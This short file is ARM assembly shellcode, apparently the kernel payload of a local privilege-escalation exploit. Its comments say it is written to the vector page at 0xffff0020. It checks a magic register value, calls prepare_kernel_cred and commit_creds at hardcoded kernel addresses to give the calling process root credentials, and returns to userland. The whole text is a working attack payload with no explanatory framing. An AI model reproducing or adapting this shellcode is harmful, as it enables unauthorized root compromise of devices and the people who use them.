This code will be written to 0xffff0020
It elevates the privileges of the calling process and
returns to userland
@ check if magic
cmp r7, #0xb0000000
bne exit
stmfd sp!,{r0-r12}
mov r0, #0
@ldr r3, =0xc0049a00 @ prepare_kernel_cred
ldr r3, =0xc006d980 @ prepare_kernel_cred
blx r3
@ldr r4, =0xc0049438 @ commit_creds
ldr r4, =0xc006d3c4 @ commit_creds
blx r4
ldmfd sp!, {r0-r12, pc}^ @ return to userland
@ go to syscall handler
ldr pc, [pc, #980] @ go to normal swi handler